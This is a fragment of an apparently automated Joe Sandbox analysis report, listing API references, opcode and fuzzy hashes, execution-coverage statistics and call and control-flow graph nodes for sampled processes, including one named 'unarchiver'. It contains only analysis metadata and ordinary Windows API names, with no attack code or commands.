                                                          • Instruction Fuzzy Hash: 5601ADB0A04306AFDF41CB68D841F463BA5BB03368F010158F906DF280D776BA6A9714
                                                          APIs
                                                          • ___swprintf_l.LIBCMT ref: 6FDF5110
                                                          • swprintf.LIBCMT ref: 6FDF5133
                                                            • Part of subcall function 6FDFB717: __vswprintf_s_l.MSPDB140-MSVCRT ref: 6FDFB729
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000012.00000002.1697486619.000000006FDF1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FDF0000, based on PE: true
                                                          • Associated: 00000012.00000002.1697459893.000000006FDF0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000012.00000002.1697518937.000000006FE01000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000012.00000002.1697542069.000000006FE02000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_18_2_6fdf0000_Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.jbxd
                                                          Similarity
                                                          • API ID: ___swprintf_l__vswprintf_s_lswprintf
                                                          • String ID: %lf
                                                          • API String ID: 391901838-2891890143
                                                          • Opcode ID: 805510e89bcc2eb16282b3584f25f35884aa96ae4593e455adf80e3ad6ed008e
                                                          • Instruction ID: 9b20e487c1485290624aa803dcf2ae81039cd5949c2ee2c7288d24e6049cbe2f
                                                          • Opcode Fuzzy Hash: 805510e89bcc2eb16282b3584f25f35884aa96ae4593e455adf80e3ad6ed008e
                                                          • Instruction Fuzzy Hash: 41F024B5101208BBDB04AB85CC49FBF3F6CDF85298F024098FA491B280DB35BE1193B2
                                                          APIs
                                                          • std::__non_rtti_object::__construct_from_string_literal.LIBVCRUNTIME ref: 6FDF45B6
                                                          • _CxxThrowException.VCRUNTIME140(?,6FDFFCE8), ref: 6FDF45DD
                                                            • Part of subcall function 6FDF48A0: __telemetry_main_return_trigger.VCRUNTIME140(Bad dynamic_cast!,00000000,?,?,?,?,6FDF45E2,?,6FDFFCE8), ref: 6FDF48D0
                                                            • Part of subcall function 6FDF48A0: RaiseException.KERNEL32(E06D7363,00000001,00000003,6FDF45E2,?,?,?,?,6FDF45E2,?,6FDFFCE8), ref: 6FDF4900
                                                          Strings
                                                          • Access violation - no RTTI data!, xrefs: 6FDF45AD
                                                          Memory Dump Source
                                                          • Source File: 00000012.00000002.1697486619.000000006FDF1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FDF0000, based on PE: true
                                                          • Associated: 00000012.00000002.1697459893.000000006FDF0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000012.00000002.1697518937.000000006FE01000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000012.00000002.1697542069.000000006FE02000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_18_2_6fdf0000_Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.jbxd
                                                          Similarity
                                                          • API ID: Exception$RaiseThrow__telemetry_main_return_triggerstd::__non_rtti_object::__construct_from_string_literal
                                                          • String ID: Access violation - no RTTI data!
                                                          • API String ID: 1667904068-2158758863
                                                          • Opcode ID: 570b67a869c5cb75e640ed19d2965f5bf415ae35a37120b86554b9839bfe0b3e
                                                          • Instruction ID: 875aa418f05938be3d590e970ea0618f2c3a69bc1fe8d2df63e6d5c8c60dfd33
                                                          • Opcode Fuzzy Hash: 570b67a869c5cb75e640ed19d2965f5bf415ae35a37120b86554b9839bfe0b3e
                                                          • Instruction Fuzzy Hash: 22C0127280A248ABCA84D7E0E746CCD73B8B90A210B620552E610B6080EB71B91B4630
                                                          APIs
                                                          • std::__non_rtti_object::__construct_from_string_literal.LIBVCRUNTIME ref: 6FDF4633
                                                          • _CxxThrowException.VCRUNTIME140(6FDFFC38,6FDFFCCC,6FDFFC38,00000014,?,6FDFFCE8), ref: 6FDF4677
                                                            • Part of subcall function 6FDF48A0: __telemetry_main_return_trigger.VCRUNTIME140(Bad dynamic_cast!,00000000,?,?,?,?,6FDF45E2,?,6FDFFCE8), ref: 6FDF48D0
                                                            • Part of subcall function 6FDF48A0: RaiseException.KERNEL32(E06D7363,00000001,00000003,6FDF45E2,?,?,?,?,6FDF45E2,?,6FDFFCE8), ref: 6FDF4900
                                                          Strings
                                                          • Access violation - no RTTI data!, xrefs: 6FDF4657
                                                          Memory Dump Source
                                                          • Source File: 00000012.00000002.1697486619.000000006FDF1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FDF0000, based on PE: true
                                                          • Associated: 00000012.00000002.1697459893.000000006FDF0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000012.00000002.1697518937.000000006FE01000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000012.00000002.1697542069.000000006FE02000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_18_2_6fdf0000_Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.jbxd
                                                          Similarity
                                                          • API ID: Exception$RaiseThrow__telemetry_main_return_triggerstd::__non_rtti_object::__construct_from_string_literal
                                                          • String ID: Access violation - no RTTI data!
                                                          • API String ID: 1667904068-2158758863
                                                          • Opcode ID: 4d2e9591ee14fd16e3d82ea2d7f47741cc99c5f025751208e51db9f02efc79f7
                                                          • Instruction ID: 3d1572b27034b81d3c12c8eea0c098eb21178b1bd70c7613ba5ae0df9fbbdc07
                                                          • Opcode Fuzzy Hash: 4d2e9591ee14fd16e3d82ea2d7f47741cc99c5f025751208e51db9f02efc79f7
                                                          • Instruction Fuzzy Hash: 29D0C77680A14CAB8A98C7E4E745CCD7368F506110F5249529740AB440F675B9574666
                                                          APIs
                                                          • std::__non_rtti_object::__construct_from_string_literal.LIBVCRUNTIME ref: 6FDF44DA
                                                          • _CxxThrowException.VCRUNTIME140(?,6FDFFC74), ref: 6FDF44EA
                                                            • Part of subcall function 6FDF48A0: __telemetry_main_return_trigger.VCRUNTIME140(Bad dynamic_cast!,00000000,?,?,?,?,6FDF45E2,?,6FDFFCE8), ref: 6FDF48D0
                                                            • Part of subcall function 6FDF48A0: RaiseException.KERNEL32(E06D7363,00000001,00000003,6FDF45E2,?,?,?,?,6FDF45E2,?,6FDFFCE8), ref: 6FDF4900
                                                          Strings
                                                          • Access violation - no RTTI data!, xrefs: 6FDF44D1
                                                          Memory Dump Source
                                                          • Source File: 00000012.00000002.1697486619.000000006FDF1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FDF0000, based on PE: true
                                                          • Associated: 00000012.00000002.1697459893.000000006FDF0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000012.00000002.1697518937.000000006FE01000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000012.00000002.1697542069.000000006FE02000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_18_2_6fdf0000_Ozn men _o_zji ten _poru en _pr v_du evn ho_vlastnictv _.jbxd
                                                          Similarity
                                                          • API ID: Exception$RaiseThrow__telemetry_main_return_triggerstd::__non_rtti_object::__construct_from_string_literal
                                                          • String ID: Access violation - no RTTI data!
                                                          • API String ID: 1667904068-2158758863
                                                          • Opcode ID: 6fd9305238d9d8372814ee7f19c6aab71bf4c4b4a1250883e6fcdee972fcb814
                                                          • Instruction ID: 841960330927b2d2ad848dc6b167ce4d824c4b2724a426786c5376859243bedf
                                                          • Opcode Fuzzy Hash: 6fd9305238d9d8372814ee7f19c6aab71bf4c4b4a1250883e6fcdee972fcb814
                                                          • Instruction Fuzzy Hash: A5C012728062086BCA84C7D0E546CCD73A8A909110B610452D610A2080E761B91A8670

                                                          Execution Graph

                                                          Execution Coverage

                                                          Dynamic/Packed Code Coverage

                                                          Signature Coverage

                                                          Execution Coverage:21%
                                                          Dynamic/Decrypted Code Coverage:100%
                                                          Signature Coverage:0%
                                                          Total number of Nodes:76
                                                          Total number of Limit Nodes:4
                                                          Show Legend
                                                          Hide Nodes/Edges
                                                          execution_graph 1188 131a370 1190 131a392 RegQueryValueExW 1188->1190 1191 131a41b 1190->1191 1152 131a933 1154 131a962 WriteFile 1152->1154 1155 131a9c9 1154->1155 1095 131a172 1096 131a1c2 FindNextFileW 1095->1096 1097 131a1ca 1096->1097 1098 131afb2 1099 131afde FindClose 1098->1099 1101 131b010 1098->1101 1100 131aff3 1099->1100 1101->1099 1156 131b1b4 1157 131b1d6 GetSystemInfo 1156->1157 1159 131b210 1157->1159 1192 131ab76 1193 131abe6 CreatePipe 1192->1193 1195 131ac3e 1193->1195 1122 131a5fe 1125 131a636 CreateFileW 1122->1125 1124 131a685 1125->1124 1160 131a120 1161 131a172 FindNextFileW 1160->1161 1163 131a1ca 1161->1163 1126 131a962 1127 131a997 WriteFile 1126->1127 1129 131a9c9 1127->1129 1145 131abe6 1146 131ac36 CreatePipe 1145->1146 1147 131ac3e 1146->1147 1164 131a2ae 1165 131a2b2 SetErrorMode 1164->1165 1167 131a31b 1165->1167 1196 131a850 1198 131a882 SetFilePointer 1196->1198 1199 131a8e6 1198->1199 1200 131a6d4 1202 131a716 CloseHandle 1200->1202 1203 131a750 1202->1203 1106 131a716 1107 131a781 1106->1107 1108 131a742 CloseHandle 1106->1108 1107->1108 1109 131a750 1108->1109 1114 131b1d6 1115 131b202 GetSystemInfo 1114->1115 1116 131b238 1114->1116 1117 131b210 1115->1117 1116->1115 1118 131a2da 1119 131a306 SetErrorMode 1118->1119 1120 131a32f 1118->1120 1121 131a31b 1119->1121 1120->1119 1204 131a5dc 1206 131a5fe CreateFileW 1204->1206 1207 131a685 1206->1207 1130 131a882 1132 131a8b7 SetFilePointer 1130->1132 1133 131a8e6 1132->1133 1168 131ad04 1169 131ad2a DuplicateHandle 1168->1169 1171 131adaf 1169->1171 1141 131aa46 1142 131aa6c CreateDirectoryW 1141->1142 1144 131aa93 1142->1144 1172 131aa0b 1173 131aa46 CreateDirectoryW 1172->1173 1175 131aa93 1173->1175 1176 131af8b 1177 131afb2 FindClose 1176->1177 1179 131aff3 1177->1179 1180 131a50f 1181 131a540 GetTempPathW 1180->1181 1183 131a5c4 1181->1183 1184 131a78f 1185 131a7c2 GetFileType 1184->1185 1187 131a824 1185->1187

                                                          Callgraph

                                                          Hide Legend
                                                          • Executed
                                                          • Not Executed
                                                          • Opacity -> Relevance
                                                          • Disassembly available
                                                          callgraph 0 Function_01312531 1 Function_01490648 13 Function_0149066A 1->13 2 Function_01312430 3 Function_0131A933 4 Function_01640C60 5 Function_0131A23A 6 Function_0131A33D 7 Function_0131213C 8 Function_0131B121 9 Function_0131A120 10 Function_0131AF22 11 Function_0131AD2A 12 Function_0131A02E 14 Function_0149026D 15 Function_0131A716 16 Function_01640748 17 Function_0131201C 18 Function_0131B01E 19 Function_0131AF00 20 Function_0131A005 21 Function_0131AE05 22 Function_01640C50 23 Function_0131AD04 24 Function_0149067F 25 Function_0131AB06 26 Function_0131AA0B 27 Function_0131A50F 28 Function_01490808 29 Function_0131A370 30 Function_0131B470 31 Function_0131A172 32 Function_0149000C 33 Function_0131B276 34 Function_0131AB76 35 Function_01490001 36 Function_01312579 37 Function_0131A078 38 Function_01490606 39 Function_01490718 40 Function_0131A962 41 Function_0131A462 42 Function_01312264 43 Function_01312364 44 Function_0131A566 45 Function_01640C3D 46 Function_0131AC6C 47 Function_01640739 48 Function_0131B351 49 Function_0131A850 50 Function_0131B052 51 Function_0149082E 52 Function_01312458 53 Function_0131B15D 54 Function_01640E08 84 Function_01640BA0 54->84 55 Function_0131A45C 56 Function_01640014 57 Function_0131AA46 58 Function_0131B246 59 Function_01640E18 59->84 60 Function_0131AEB2 61 Function_0131AFB2 62 Function_01640DE0 62->84 63 Function_0131B1B4 64 Function_014905C0 65 Function_013123BC 66 Function_014905D0 67 Function_0131A2AE 68 Function_0131A392 69 Function_016402C0 69->38 71 Function_014905E1 69->71 69->84 105 Function_01640799 69->105 70 Function_01312194 72 Function_01312098 73 Function_0131A09A 74 Function_0131B49E 75 Function_0131B39E 76 Function_0131A882 77 Function_01640DD1 77->84 78 Function_0131A486 79 Function_0131AF8B 80 Function_0131A78F 81 Function_0131AC8E 82 Function_013121F0 83 Function_01312BF0 85 Function_013123F4 86 Function_0131A1F4 87 Function_01640DA2 87->84 88 Function_01640CA8 89 Function_01490784 90 Function_0131A5FE 91 Function_013126E1 92 Function_0131AAE0 93 Function_016402B0 93->38 93->71 93->84 93->105 94 Function_016405B1 95 Function_0131ABE6 96 Function_013120D0 97 Function_0131A6D4 98 Function_0131B1D6 99 Function_0131A2DA 100 Function_0131AADA 101 Function_01640B8F 102 Function_0131A5DC 103 Function_0131A7C2 104 Function_014907B2 105->4 105->22 105->38 105->71 105->84 105->88 106 Function_01640C99 105->106 107 Function_014907B6

                                                          Executed Functions

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 0 131b246-131b2eb 5 131b343-131b348 0->5 6 131b2ed-131b2f5 DuplicateHandle 0->6 5->6 8 131b2fb-131b30d 6->8 9 131b34a-131b34f 8->9 10 131b30f-131b340 8->10 9->10
                                                          APIs
                                                          • DuplicateHandle.KERNELBASE(?,00000E24), ref: 0131B2F3
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2150695670.000000000131A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0131A000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_131a000_unarchiver.jbxd
                                                          Similarity
                                                          • API ID: DuplicateHandle
                                                          • String ID:
                                                          • API String ID: 3793708945-0
                                                          • Opcode ID: 18515d4d6c673bc321bf38965c8168618a841b54851c2ac6b872e76f820ebd14
                                                          • Instruction ID: d6044f3c7a6f0c30aef9fb7cc3d48df4a7e92ad31352e74f96775b6a734b0f25
                                                          • Opcode Fuzzy Hash: 18515d4d6c673bc321bf38965c8168618a841b54851c2ac6b872e76f820ebd14
                                                          • Instruction Fuzzy Hash: C131A171404344AFE7228B21DC45FA6BFBCEF06714F04889AF985CB162D324A9198B71

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 14 131ad04-131ad9f 19 131ada1-131ada9 DuplicateHandle 14->19 20 131adf7-131adfc 14->20 21 131adaf-131adc1 19->21 20->19 23 131adc3-131adf4 21->23 24 131adfe-131ae03 21->24 24->23
                                                          APIs
                                                          • DuplicateHandle.KERNELBASE(?,00000E24), ref: 0131ADA7
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2150695670.000000000131A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0131A000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_131a000_unarchiver.jbxd
                                                          Similarity
                                                          • API ID: DuplicateHandle
                                                          • String ID:
                                                          • API String ID: 3793708945-0
                                                          • Opcode ID: a489f36121eea014d12b0b6e10c06d2fa9d5d33c3b4937eb2a4f4efdac46459b
                                                          • Instruction ID: ef2e56a8da8c9b4b553294ddf9b5bd0548ff0b6571c74d86fcf76e5fba767e51
                                                          • Opcode Fuzzy Hash: a489f36121eea014d12b0b6e10c06d2fa9d5d33c3b4937eb2a4f4efdac46459b
                                                          • Instruction Fuzzy Hash: 3431B1B1404384AFEB228F65DC45FA7BFBCEF05624F04899AF985CB152D324A549CB71

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 28 131ab76-131ac67 CreatePipe
                                                          APIs
                                                          • CreatePipe.KERNELBASE(?,00000E24,?,?), ref: 0131AC36
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2150695670.000000000131A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0131A000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_131a000_unarchiver.jbxd
                                                          Similarity
                                                          • API ID: CreatePipe
                                                          • String ID:
                                                          • API String ID: 2719314638-0
                                                          • Opcode ID: 34bb5b53b204b42860f6392a621555c742af50031f2fb4a6998e68b378c23628
                                                          • Instruction ID: 5203096b2f9c6fb748a8174c512b6520dc90136cf4c9801fb3b2e786e4851767
                                                          • Opcode Fuzzy Hash: 34bb5b53b204b42860f6392a621555c742af50031f2fb4a6998e68b378c23628
                                                          • Instruction Fuzzy Hash: CC316F7150E3C05FD3038B718C65A55BFB4AF47610F1A85CBD884CF1A3D269A919C762

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 33 131a5dc-131a656 37 131a658 33->37 38 131a65b-131a667 33->38 37->38 39 131a669 38->39 40 131a66c-131a675 38->40 39->40 41 131a677-131a69b CreateFileW 40->41 42 131a6c6-131a6cb 40->42 45 131a6cd-131a6d2 41->45 46 131a69d-131a6c3 41->46 42->41 45->46
                                                          APIs
                                                          • CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 0131A67D
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2150695670.000000000131A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0131A000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_131a000_unarchiver.jbxd
                                                          Similarity
                                                          • API ID: CreateFile
                                                          • String ID:
                                                          • API String ID: 823142352-0
                                                          • Opcode ID: 5ca91548814092012d4e6b72d6723b921f285540cd9eaed74cda9e94c47cceaa
                                                          • Instruction ID: 8427033573ab5d29d2880481dceb37bf86a1e12174faa00b974cb4c284cac3a9
                                                          • Opcode Fuzzy Hash: 5ca91548814092012d4e6b72d6723b921f285540cd9eaed74cda9e94c47cceaa
                                                          • Instruction Fuzzy Hash: 58319FB1505380AFE722CF25DD45F66BFE8EF45224F08889EE9858B252D375E809CB71

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 49 131a120-131a1f3 FindNextFileW
                                                          APIs
                                                          • FindNextFileW.KERNELBASE(?,00000E24,?,?), ref: 0131A1C2
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2150695670.000000000131A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0131A000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_131a000_unarchiver.jbxd
                                                          Similarity
                                                          • API ID: FileFindNext
                                                          • String ID:
                                                          • API String ID: 2029273394-0
                                                          • Opcode ID: d20cbed37afb70ac1a80055d087ddda7222d5cdc3c342d6aad932294c9e2902f
                                                          • Instruction ID: 62e36ee888d50b03bc6f720d2892f905ac11e2451909991cfab7301a5fc56a3f
                                                          • Opcode Fuzzy Hash: d20cbed37afb70ac1a80055d087ddda7222d5cdc3c342d6aad932294c9e2902f
                                                          • Instruction Fuzzy Hash: 1A21A17140D3C06FD3128B25CC51BA6BFB4EF47610F1985CBE8848F293D329A919C7A2

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 76 131ad2a-131ad9f 80 131ada1-131ada9 DuplicateHandle 76->80 81 131adf7-131adfc 76->81 82 131adaf-131adc1 80->82 81->80 84 131adc3-131adf4 82->84 85 131adfe-131ae03 82->85 85->84
                                                          APIs
                                                          • DuplicateHandle.KERNELBASE(?,00000E24), ref: 0131ADA7
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2150695670.000000000131A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0131A000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_131a000_unarchiver.jbxd
                                                          Similarity
                                                          • API ID: DuplicateHandle
                                                          • String ID:
                                                          • API String ID: 3793708945-0
                                                          • Opcode ID: 540c9744a4e755b9bac57d09a2c36986bae653b465644cd7c954e58b8cfdd48b
                                                          • Instruction ID: 7491757afacbd8f1f0569167a860835910113e81727b958d001138b4760b10ea
                                                          • Opcode Fuzzy Hash: 540c9744a4e755b9bac57d09a2c36986bae653b465644cd7c954e58b8cfdd48b
                                                          • Instruction Fuzzy Hash: 9321F171000604AFEB218F65DD45FABFBECEF04724F04886AFA45CB552D734E5488BA1

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 71 131a50f-131a563 73 131a566-131a5be GetTempPathW 71->73 75 131a5c4-131a5da 73->75
                                                          APIs
                                                          • GetTempPathW.KERNELBASE(?,00000E24,?,?), ref: 0131A5B6
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2150695670.000000000131A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0131A000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_131a000_unarchiver.jbxd
                                                          Similarity
                                                          • API ID: PathTemp
                                                          • String ID:
                                                          • API String ID: 2920410445-0
                                                          • Opcode ID: c326bceac01adf38cfabf8c05984202268f3930449bb96f9a5b3dda05212f5ca
                                                          • Instruction ID: 9cd449c91e86b1180d60a9aba768abb26a3930a221467c0ff2ed62a3d532c563
                                                          • Opcode Fuzzy Hash: c326bceac01adf38cfabf8c05984202268f3930449bb96f9a5b3dda05212f5ca
                                                          • Instruction Fuzzy Hash: 592181B150D3806FD3138B25CC51B62BFB8EF87614F0A81DBE8849B593D625A919C7B2

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 54 131a370-131a3cf 57 131a3d1 54->57 58 131a3d4-131a3dd 54->58 57->58 59 131a3e2-131a3e8 58->59 60 131a3df 58->60 61 131a3ea 59->61 62 131a3ed-131a404 59->62 60->59 61->62 64 131a406-131a419 RegQueryValueExW 62->64 65 131a43b-131a440 62->65 66 131a442-131a447 64->66 67 131a41b-131a438 64->67 65->64 66->67
                                                          APIs
                                                          • RegQueryValueExW.KERNELBASE(?,00000E24,4E46DEC3,00000000,00000000,00000000,00000000), ref: 0131A40C
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2150695670.000000000131A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0131A000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_131a000_unarchiver.jbxd
                                                          Similarity
                                                          • API ID: QueryValue
                                                          • String ID:
                                                          • API String ID: 3660427363-0
                                                          • Opcode ID: 1df6180eb83157ed2c7629013521b34251a333e49b9ff0480c93aea0ac783714
                                                          • Instruction ID: 1f6f47b5e6c51e94f4f289638f32f310d3ff356ec3c47ea8e6686a06fc9c1b16
                                                          • Opcode Fuzzy Hash: 1df6180eb83157ed2c7629013521b34251a333e49b9ff0480c93aea0ac783714
                                                          • Instruction Fuzzy Hash: 50218DB1505780AFE721CF15DC84FA3BBF8EF05614F08849AE985CB252D364E948CB71

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 89 131b276-131b2eb 93 131b343-131b348 89->93 94 131b2ed-131b2f5 DuplicateHandle 89->94 93->94 96 131b2fb-131b30d 94->96 97 131b34a-131b34f 96->97 98 131b30f-131b340 96->98 97->98
                                                          APIs
                                                          • DuplicateHandle.KERNELBASE(?,00000E24), ref: 0131B2F3
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2150695670.000000000131A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0131A000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_131a000_unarchiver.jbxd
                                                          Similarity
                                                          • API ID: DuplicateHandle
                                                          • String ID:
                                                          • API String ID: 3793708945-0
                                                          • Opcode ID: 8f19f6981df9ba1473306224f0012fb35cd37a7b0ed5df130e94c15df65731ba
                                                          • Instruction ID: 9778c05a0a0cb60fe759dc28d1fb8e3ea8257a0d1affd0d009a587b6d187d53a
                                                          • Opcode Fuzzy Hash: 8f19f6981df9ba1473306224f0012fb35cd37a7b0ed5df130e94c15df65731ba
                                                          • Instruction Fuzzy Hash: D321ED72400204AFEB219F65DC45FABFBACEF04724F04886AFA458A256D334E5188BA1

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 102 131a850-131a8d6 106 131a8d8-131a8f8 SetFilePointer 102->106 107 131a91a-131a91f 102->107 110 131a921-131a926 106->110 111 131a8fa-131a917 106->111 107->106 110->111
                                                          APIs
                                                          • SetFilePointer.KERNELBASE(?,00000E24,4E46DEC3,00000000,00000000,00000000,00000000), ref: 0131A8DE
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2150695670.000000000131A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0131A000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_131a000_unarchiver.jbxd
                                                          Similarity
                                                          • API ID: FilePointer
                                                          • String ID:
                                                          • API String ID: 973152223-0
                                                          • Opcode ID: f3e2d98d6e198873a31f0691430271af7e506b52409ea7819efdaaedb20c55f1
                                                          • Instruction ID: c5121d16711fc99162bd421340d7312f544b4b8500885d6d2dd0a5a354dd02d3
                                                          • Opcode Fuzzy Hash: f3e2d98d6e198873a31f0691430271af7e506b52409ea7819efdaaedb20c55f1
                                                          • Instruction Fuzzy Hash: 8721C471409380AFE7228F24DC44FA2BFB8EF46714F0984DAF9848B153C324A909C771

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 114 131a933-131a9b9 118 131a9bb-131a9db WriteFile 114->118 119 131a9fd-131aa02 114->119 122 131aa04-131aa09 118->122 123 131a9dd-131a9fa 118->123 119->118 122->123
                                                          APIs
                                                          • WriteFile.KERNELBASE(?,00000E24,4E46DEC3,00000000,00000000,00000000,00000000), ref: 0131A9C1
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2150695670.000000000131A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0131A000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_131a000_unarchiver.jbxd
                                                          Similarity
                                                          • API ID: FileWrite
                                                          • String ID:
                                                          • API String ID: 3934441357-0
                                                          • Opcode ID: 98cc7865c577ff9b87058bf677434ef638b7074e3bab5384651cf6eca6d926dc
                                                          • Instruction ID: 6002bcf056be9fffc7421b53ce65ca59cfe7dd29b764cbf204905bca53c152ed
                                                          • Opcode Fuzzy Hash: 98cc7865c577ff9b87058bf677434ef638b7074e3bab5384651cf6eca6d926dc
                                                          • Instruction Fuzzy Hash: 7A21AE71409380AFDB228F25DD45F96BFB8EF06714F0884DAE9858B153C365A548CBB2

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 126 131a5fe-131a656 129 131a658 126->129 130 131a65b-131a667 126->130 129->130 131 131a669 130->131 132 131a66c-131a675 130->132 131->132 133 131a677-131a67f CreateFileW 132->133 134 131a6c6-131a6cb 132->134 135 131a685-131a69b 133->135 134->133 137 131a6cd-131a6d2 135->137 138 131a69d-131a6c3 135->138 137->138
                                                          APIs
                                                          • CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 0131A67D
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2150695670.000000000131A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0131A000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_131a000_unarchiver.jbxd
                                                          Similarity
                                                          • API ID: CreateFile
                                                          • String ID:
                                                          • API String ID: 823142352-0
                                                          • Opcode ID: c9ab0d5e420918ace99206cfccc7e9cfcfaaaca4bda5694126203acf31ac340e
                                                          • Instruction ID: 0c6695e85271fb382987d5c429eb4fec468184427c22328a17ea483f6a6d5c6b
                                                          • Opcode Fuzzy Hash: c9ab0d5e420918ace99206cfccc7e9cfcfaaaca4bda5694126203acf31ac340e
                                                          • Instruction Fuzzy Hash: D021C171501240AFE721CF65DD45F66FBE8EF08324F04886DEA498B256D375E408CB71

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 141 131a78f-131a80d 145 131a842-131a847 141->145 146 131a80f-131a822 GetFileType 141->146 145->146 147 131a824-131a841 146->147 148 131a849-131a84e 146->148 148->147
                                                          APIs
                                                          • GetFileType.KERNELBASE(?,00000E24,4E46DEC3,00000000,00000000,00000000,00000000), ref: 0131A815
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2150695670.000000000131A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0131A000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_131a000_unarchiver.jbxd
                                                          Similarity
                                                          • API ID: FileType
                                                          • String ID:
                                                          • API String ID: 3081899298-0
                                                          • Opcode ID: 104670c9bdf76d01a2fa8835c95fc5a1ae3caa659e7c40fcce8e7d5b3bf71da4
                                                          • Instruction ID: 6314bbb2d651792b51d7231dc80f7e2870512e7fbdf28a748adff1f280b6b735
                                                          • Opcode Fuzzy Hash: 104670c9bdf76d01a2fa8835c95fc5a1ae3caa659e7c40fcce8e7d5b3bf71da4
                                                          • Instruction Fuzzy Hash: EA21E7B54097806FE7128B21DC45BA2BFB8DF47714F0880DBF9858B193D368A909C775

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 152 131aa0b-131aa6a 154 131aa6c 152->154 155 131aa6f-131aa75 152->155 154->155 156 131aa77 155->156 157 131aa7a-131aa83 155->157 156->157 158 131aa85-131aaa5 CreateDirectoryW 157->158 159 131aac4-131aac9 157->159 162 131aaa7-131aac3 158->162 163 131aacb-131aad0 158->163 159->158 163->162
                                                          APIs
                                                          • CreateDirectoryW.KERNELBASE(?,?), ref: 0131AA8B
